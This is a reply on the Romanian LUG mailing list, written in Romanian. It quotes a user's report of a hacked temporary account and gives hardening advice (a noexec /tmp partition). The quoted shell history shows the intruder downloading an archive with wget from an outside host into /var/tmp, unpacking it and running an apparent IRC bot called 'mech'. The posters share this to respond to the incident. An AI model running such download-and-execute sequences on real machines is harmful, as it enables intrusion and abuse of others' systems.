Adrian Coman wrote: >Din cauza ca sunt prost si am facut un user temp + am uitat sa pornesc >firewall-ul (il oprisem cu motiv) s-a gasit cineva care mi-a spart >acest cont. > >Mi-am dat seama la timp si acum am acces la history-ul lui: > > 9 cat /etc/hosts > 10 cd /var/tmp > 11 /sbin/ifconfig > 12 cd /var/tmp > 13 cd /var/tmp > 14 wget basarabi.go.ro/mech.tar.gz > 15 tar zxf mech.tar.gz > 16 rm -rf mech.tar.gz > 17 cd mech > 18 ./mech > 19 ./mech > 20 ./mech > > >Am si programul asta, nu a mai avut timp sa stearga nimic. >Aveti idee ce face? Am cautat google si nu m-am dumirit. >Directorul mech contine: > >LinkEvents >mech >mech2.usr >mech3.usr >mech.levels >mech.pid >mech.session >mech.set >randfiles >Vampir.seen > >Cred ca are legatura cu IRC-ul ca vad niste mesaje ptr ca in >directorul randfiles sunt niste fisiere txt cu diverse mesaje. > >V-ati intalnit (folosit) acest programel? Stiti ce face? Ce trebuie sa >ve verific sa fiu sigur ca nu mi-a modificat ceva prin sistem? > >Thanks, >Adi > >--- >Detalii despre listele noastre de mail: http://www.lug.ro/ > > > > Nu am idee, dar nu era rau daca aveai /tmp pe o partitie separata si in fstab, puneai si un NOEXEC(poate si un nodev, nosuid...) pt. /tmp. Cred ca daca aveai asa ceva nu se intampla!
,Iulian --- Detalii despre listele noastre de mail: http://www.lug.ro/
